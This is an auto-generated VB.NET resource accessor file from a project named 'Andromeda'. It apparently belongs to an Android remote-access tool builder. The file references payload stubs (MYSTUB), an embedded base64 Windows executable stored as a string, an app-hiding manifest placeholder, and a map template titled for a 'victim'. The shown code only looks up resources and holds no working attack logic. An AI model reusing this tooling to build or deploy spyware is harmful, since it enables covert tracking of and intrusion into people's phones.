'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:4.0.30319.42000
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "17.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("Andromeda.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _3g() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_3g", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property _on() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("_on", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Abov_mid() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Abov_mid", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Fsociety.
        '''</summary>
        Friend ReadOnly Property ARPolice() As String
            Get
                Return ResourceManager.GetString("ARPolice", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property chrg() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("chrg", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to C:\ProgramData\cconfig.
        '''</summary>
        Friend ReadOnly Property DataP() As String
            Get
                Return ResourceManager.GetString("DataP", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property disconnected() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("disconnected", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property full() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("full", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;action android:name=&quot;[HIDE_CODE]&quot;/&gt;.
        '''</summary>
        Friend ReadOnly Property HIDECODE() As String
            Get
                Return ResourceManager.GetString("HIDECODE", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property LEMONMILK_Regular() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("LEMONMILK_Regular", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property log() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("log", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property LOGO() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("LOGO", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        '''AAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
        '''ZGUuDQ0KJAAAAAAAAABQRQAATAEDAGq8rcYAAAAAAAAAAOAAIgALAVAAABgaAAByAgAAAAAA6jca
        '''AAAgAAAAQBoAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADgHAAAAgAAAAAAAAIAYIUAABAA
        '''ABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJU3GgBPAAAAAEAaAIRvAgAAAAAAAAAAAAAAAAAA
        '''AAAAAMAcAAwAAADcNhoAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
        '''AAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAA [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property LOGS() As String
            Get
                Return ResourceManager.GetString("LOGS", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property low() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("low", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to &lt;!DOCTYPE html&gt;
        '''&lt;html&gt;
        '''&lt;head&gt;
        '''&lt;meta charset=&apos;utf-8&apos; /&gt;
        '''&lt;title&gt;\\name_victim:\\&lt;/title&gt;
        '''&lt;meta name=&apos;viewport&apos; content=&apos;initial-scale=1,maximum-scale=1,user-scalable=no&apos; /&gt;
        '''&lt;script src=&apos;https://api.tiles.mapbox.com/mapbox-gl-js/v1.0.0/mapbox-gl.js&apos;&gt;&lt;/script&gt;
        '''&lt;link href=&apos;https://api.tiles.mapbox.com/mapbox-gl-js/v1.0.0/mapbox-gl.css&apos; rel=&apos;stylesheet&apos; /&gt;
        '''&lt;style&gt;
        '''body { margin:0; padding:0; }
        '''#map { position:absolute; top:0; bottom:0; width:100%; }
        '''&lt;/style&gt;
        '''&lt;/head&gt;
        '''&lt;body&gt;
        ''' &lt;div id=&apos;map&apos;&gt;&lt;/div&gt;
        ''' &lt;s [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property map() As String
            Get
                Return ResourceManager.GetString("map", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Icon similar to (Icon).
        '''</summary>
        Friend ReadOnly Property max() As System.Drawing.Icon
            Get
                Dim obj As Object = ResourceManager.GetObject("max", resourceCulture)
                Return CType(obj,System.Drawing.Icon)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property min() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("min", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property MYSTUB() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("MYSTUB", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property MYSTUBTEN() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("MYSTUBTEN", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property notifi() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("notifi", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property OFF() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("OFF", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property OFF_LOCK() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("OFF_LOCK", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property ON_LOCK() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("ON_LOCK", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property PikPng_com_phone_frame_png_962974() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("PikPng_com_phone_frame_png_962974", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to Use com moderação .
        '''</summary>
        Friend ReadOnly Property Police() As String
            Get
                Return ResourceManager.GetString("Police", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to                 &lt;action android:name=&quot;android.intent.action.CHOOSER&quot;/&gt;
        '''                &lt;action android:name=&quot;android.intent.action.MAIN&quot;/&gt;
        '''                &lt;category android:name=&quot;android.intent.category.INFO&quot;/&gt;
        '''                &lt;action android:name=&quot;android.intent.action.VIEW&quot;/&gt;
        '''                &lt;category android:name=&quot;android.intent.category.DEFAULT&quot;/&gt;
        '''                &lt;category android:name=&quot;com.android.internal.category.PLATLOGO&quot;/&gt;
        '''                &lt;action android:name=&quot;android.intent.action.SEND&quot;/&gt;
        '''  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property SDK29() As String
            Get
                Return ResourceManager.GetString("SDK29", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property target__1_() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("target__1_", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .
        '''</summary>
        Friend ReadOnly Property TF() As String
            Get
                Return ResourceManager.GetString("TF", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to /9j/4QN0RXhpZgAATU0AKgAAAAgABwESAAMAAAABAAEAAAEaAAUAAAABAAAAYgEbAAUAAAABAAAAagEoAAMAAAABAAIAAAExAAIAAAAcAAAAcgEyAAIAAAAUAAAAjodpAAQAAAABAAAApAAAANAADqZ4AAAnEAAOpngAACcQQWRvYmUgUGhvdG9zaG9wIENTNSBXaW5kb3dzADIwMTc6MTA6MTMgMDE6NDM6MDcAAAAAA6ABAAMAAAAB//8AAKACAAQAAAABAAAAMKADAAQAAAABAAAAMAAAAAAAAAAGAQMAAwAAAAEABgAAARoABQAAAAEAAAEeARsABQAAAAEAAAEmASgAAwAAAAEAAgAAAgEABAAAAAEAAAEuAgIABAAAAAEAAAI+AAAAAAAAAEgAAAABAAAASAAAAAH/2P/tAAxBZG9iZV9DTQAC/+4ADkFkb2JlAGSAAAAAAf/bAIQADAgICAkIDAkJDBELCgsRFQ8MDA8VGBMTFRMTGBEMDAwM [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property wallpaper() As String
            Get
                Return ResourceManager.GetString("wallpaper", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property wifi() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("wifi", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
    End Module
End Namespace
